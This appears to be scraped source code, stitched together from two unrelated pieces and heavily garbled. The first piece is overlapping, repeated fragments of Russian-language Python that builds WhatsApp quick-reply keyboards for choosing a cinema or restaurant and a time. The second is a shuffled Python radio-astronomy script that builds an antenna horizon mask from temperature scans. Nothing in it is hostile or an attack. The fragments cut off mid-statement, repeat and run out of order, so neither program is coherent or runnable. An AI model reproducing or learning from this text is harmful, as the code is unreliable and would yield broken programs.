caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый", "text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00'))", "KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы", "время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image():", "для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb", "= QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\" ) kb", "id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное", "kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\"", "отправить клавиатуру с изображением, вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage(", "generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb", "= QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" )", "content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для", "return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В", "the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан')) return kb", "= QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру", ") kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content =", "QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"),", "QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите", "caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time(): kb_content", "caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан'))", "использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the footer\"", "удобное для Вас время\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"cinema_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return", "generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb", "from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите", "callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из", "import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите", "header=\"Куда вы сегодня хотите сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb =", "изображением, вместо заголовка. В примере не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is", "from waio.keyboard.reply import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place():", "не использовалось kb_content = QuickReplyContentImage( url=\"https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg\", text=\"this is the body\", caption=\"this is the", "# Можно отправить клавиатуру с изображением, вместо заголовка. В примере не использовалось kb_content", "= QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\",", "Можно отправить клавиатуру с изображением, вместо заголовка. В примере не использовалось kb_content =", "сходить?\", text=\"Выберите из предложенного списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан'))", "списка\", caption=\"\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"place\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан')) return kb def generate_keyboard_cinema_time():", "id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00')) return kb def generate_keyboard_restaurant_time(): kb_content = QuickReplyContentText( header=\"Ресторан\", text=\"Выберите удобное", "удобное для Вас время\", caption=\"\", ) kb = QuickReply(callback_data=callback_reply_keyboard.new(name=\"restaurant_time\", id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return", "id=\"2\"), content=kb_content) kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением,", "is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content) kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан')) return", "is the body\", caption=\"this is the footer\" ) kb = QuickReply(callback_data=callback_reply_keyboard.new(type=\"start\", id=\"1\"), content=kb_content)", "QuickReplyContentImage from callback import callback_reply_keyboard def generate_keyboard_place(): kb_content = QuickReplyContentText( header=\"Куда вы сегодня", "kb_content = QuickReplyContentText( header=\"Кинотеатр\", text=\"Выберите удобное для Вас время\", caption=\"\" ) kb =", "kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00')) return kb def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка." ]
[ "plus the atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T. 199", "set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load", "= (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape =", "This is calculated \" \"as the T_sys at zenith plus the atmospheric noise", "Check arguments if len(args) < 1: raise RuntimeError('Please specify the data file to", "dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z',", "= np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation)", "\",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361", "for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp),", "calculated \" \"as the T_sys at zenith plus the atmospheric noise contrabution at", "raise RuntimeError('Please specify the data file to reduce') # Load data set gridtemp", "the mask. This is calculated \" \"as the T_sys at zenith plus the", "angle from (azel) target associated with scan, in degrees azimuth, elevation, temp =", "dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\",", "\"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing", "in degrees azimuth, elevation, temp = [], [], [] for s in d.scans:", "atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\",", "dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float',", "to split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0,", "%f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] :", "as it is just for sorting out a boundery condition print \"Completed Gridding", "from (azel) target associated with scan, in degrees azimuth, elevation, temp = [],", "set gridtemp = [] for filename in args: print 'Loading baseline', opts.baseline, 'from", "out a boundery condition print \"Completed Gridding the data\" print \"Making the mask\"", ">= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,)", "def main(): # Parse command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data", "'Loading baseline', opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs)", "opts.baseline, 'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1:", "load (e.g. 'A1A1' for antenna 1), default is first single-dish baseline in file\")", "Only keep main scans (discard slew and cal scans) a d = d.select(freqkeep=range(200,", "= d.select(labelkeep='scan', copy=False) # Average all frequency channels into one band d.average() #", "of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g.", "a set of data files.') parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to", "= scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options and arguments parser", "mask import optparse import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab", "'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and", "Limit to make the cut-off for the mask. This is calculated \" \"as", "associated with scan, in degrees azimuth, elevation, temp = [], [], [] for", "and elevation angle from (azel) target associated with scan, in degrees azimuth, elevation,", "('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title)", "d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average", "\"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\"", "break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)',", "parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display a horizon mask", "to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to", "data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit for grid in", "= d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into one", "(azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist())", "cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3,", "= scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans (discard", "intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each", "Plot horizon mask import optparse import numpy as np import matplotlib.pyplot as plt", "= az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] =", "of optional directory containing noise diode model files\") (opts, args) = parser.parse_args() #", "np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from katpoint", "= \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The", "# Load data set gridtemp = [] for filename in args: print 'Loading", "contrabution at 10 degrees\" \"elevation as per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name", "d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels into", "help=\"Name of optional directory containing noise diode model files\") (opts, args) = parser.parse_args()", "'from data file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: #", "jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency channels", "default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture", "T_sys at zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation as", "point are well spaced, #this offset is not a problem as it is", ">= opts.temp_limit for grid in gridtemp: mask = mask * (grid >= opts.temp_limit)", "in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't", "it is just for sorting out a boundery condition print \"Completed Gridding the", "> 1: # Only keep main scans (discard slew and cal scans) a", "print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i]", "frequency channels into one band d.average() # Extract azimuth and elevation angle from", "remove_rfi(d,width=7,sigma=5) d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) #", "(opts, args) = parser.parse_args() # Check arguments if len(args) < 1: raise RuntimeError('Please", "in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): # Parse command-line options", "type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0,", "data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the point are", "= d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all", "print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist())", "# Plot horizon mask import optparse import numpy as np import matplotlib.pyplot as", "1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' %", "np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask", "remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return d def main(): #", "to ensure that the point are well spaced, #this offset is not a", "~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1)", "data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape", "[] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) ==", "optional directory containing noise diode model files\") (opts, args) = parser.parse_args() # Check", "# Average all frequency channels into one band d.average() # Extract azimuth and", "temp = [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert", "(discard slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d = remove_rfi(d,width=7,sigma=5)", "maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] =", "dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for the mask.", "per R.T. 199 .\") parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode", "len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print", "az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i]", "mask\" mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask", "mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)):", "== len(temp), \"sizes don't match\" data = (azimuth, elevation, temp) np.array(azimuth)<-89 print \"Gridding", "horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees to rotate", "= gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask * (grid", "...]', description='Display a horizon mask from a set of data files.') parser.add_option('-a', '--baseline',", "gridtemp: mask = mask * (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az", "in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure()", "antenna 1), default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\",", "len(d.freqs) > 1: # Only keep main scans (discard slew and cal scans)", "file', filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep", "%s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__ == \"__main__\": main()", "band d.average() # Extract azimuth and elevation angle from (azel) target associated with", "is just for sorting out a boundery condition print \"Completed Gridding the data\"", "temp) np.array(azimuth)<-89 print \"Gridding the data\" print \"data shape = \",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist()) print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist())", "elevation angle from (azel) target associated with scan, in degrees azimuth, elevation, temp", "for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el", "options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]', description='Display", "for antenna 1), default is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output',", "azimuth window by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the", "[], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) ==", "the point are well spaced, #this offset is not a problem as it", "file> ...]', description='Display a horizon mask from a set of data files.') parser.add_option('-a',", "default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna 1), default is first single-dish", "by.\") parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0, help=\"The Tempreture Limit to make the cut-off for", "is first single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write", "all frequency channels into one band d.average() # Extract azimuth and elevation angle", "1: raise RuntimeError('Please specify the data file to reduce') # Load data set", "parser.add_option('-a', '--baseline', dest='baseline', type=\"string\", metavar='BASELINE', default='A1A1', help=\"Baseline to load (e.g. 'A1A1' for antenna", "horizon mask import optparse import numpy as np import matplotlib.pyplot as plt import", "# Only keep main scans (discard slew and cal scans) a d =", "(deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title) #plt.ylim(0,15) #plt.title(big_title) #plt.show() if __name__", "are well spaced, #this offset is not a problem as it is just", "as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape from", "mask = gridtemp[0] >= opts.temp_limit for grid in gridtemp: mask = mask *", "command-line options and arguments parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]',", "az,el break np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:]) #plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation", "(e.g. 'A1A1' for antenna 1), default is first single-dish baseline in file\") parser.add_option('-o',", "= [], [], [] for s in d.scans: azimuth.extend(rad2deg(s.pointing['az'])) elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth)", "directory containing noise diode model files\") (opts, args) = parser.parse_args() # Check arguments", "gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the", "is not a problem as it is just for sorting out a boundery", "to reduce') # Load data set gridtemp = [] for filename in args:", "assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation,", "from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma)", "numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import scape", "baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5", "print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist()) print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist()) gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is", "import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data", "main scans (discard slew and cal scans) a d = d.select(freqkeep=range(200, 800)) d", "\"Completed Gridding the data\" print \"Making the mask\" mask = gridtemp[0] >= opts.temp_limit", "az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el", "parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in", "with scan, in degrees azimuth, elevation, temp = [], [], [] for s", "filename d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main", "type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate h5 file\") parser.add_option('-s', '--split', dest='split', action=\"store_true\", metavar='SPLIT',", "optparse import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab", "reduce') # Load data set gridtemp = [] for filename in args: print", "#az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,)) #plt.xlabel(az_title) #plt.ylabel(el_title)", "= [] for filename in args: print 'Loading baseline', opts.baseline, 'from data file',", "problem as it is just for sorting out a boundery condition print \"Completed", "data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1))) # The +361 is to ensure that the point", "one band d.average() # Extract azimuth and elevation angle from (azel) target associated", "#plt.figure() #plt.subplot(1, 1, 1) #plt.plot(maskr[1:,0],maskr[1:,1]) #az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for", "at zenith plus the atmospheric noise contrabution at 10 degrees\" \"elevation as per", "d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models) if len(d.freqs) > 1: # Only keep main scans", "enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for j,el in enumerate(np.arange(4,16,0.1)): if", "katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i in range(len(d.scans)): d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma) return", "print \"Completed Gridding the data\" print \"Making the mask\" mask = gridtemp[0] >=", "for j,el in enumerate(np.arange(4,16,0.1)): if ~mask.data[j,i] and ~mask.mask[j,i] : maskr[i] = az,el break", "just for sorting out a boundery condition print \"Completed Gridding the data\" print", "data set gridtemp = [] for filename in args: print 'Loading baseline', opts.baseline,", "d.convert_power_to_temperature(min_duration=3, jump_significance=4.0) d = d.select(flagkeep='~nd_on') d = d.select(labelkeep='scan', copy=False) # Average all frequency", "single-dish baseline in file\") parser.add_option('-o', '--output', dest='output', type=\"string\", metavar='OUTPUTFILE', default=None, help=\"Write out intermediate", "elevation.extend(rad2deg(s.pointing['el'])) temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0]))) assert len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data =", "parser.add_option(\"-n\", \"--nd-models\", help=\"Name of optional directory containing noise diode model files\") (opts, args)", "is calculated \" \"as the T_sys at zenith plus the atmospheric noise contrabution", "+361 is to ensure that the point are well spaced, #this offset is", "split each horizon plot in half\") parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0, help=\"Degrees", "* (grid >= opts.temp_limit) maskr = np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at", "import numpy as np import matplotlib.pyplot as plt import matplotlib.mlab as mlab import", "np.zeros((len(np.arange(-90,271,1)),2)) for i,az in enumerate(np.arange(-90,271,1)): print 'at az %f'%(az,) maskr[i] = az,np.max(elevation) for", "len(azimuth) == len(elevation) == len(temp), \"sizes don't match\" data = (azimuth, elevation, temp)", "not a problem as it is just for sorting out a boundery condition", "action=\"store_true\", metavar='SPLIT', default=False, help=\"Whether to split each horizon plot in half\") parser.add_option('-z', '--azshift',", "the atmospheric noise contrabution at 10 degrees\" \"elevation as per R.T. 199 .\")", "description='Display a horizon mask from a set of data files.') parser.add_option('-a', '--baseline', dest='baseline',", "# Extract azimuth and elevation angle from (azel) target associated with scan, in", "matplotlib.mlab as mlab import scape from katpoint import rad2deg def remove_rfi(d,width=3,sigma=5,axis=1): for i", "plt import matplotlib.mlab as mlab import scape from katpoint import rad2deg def 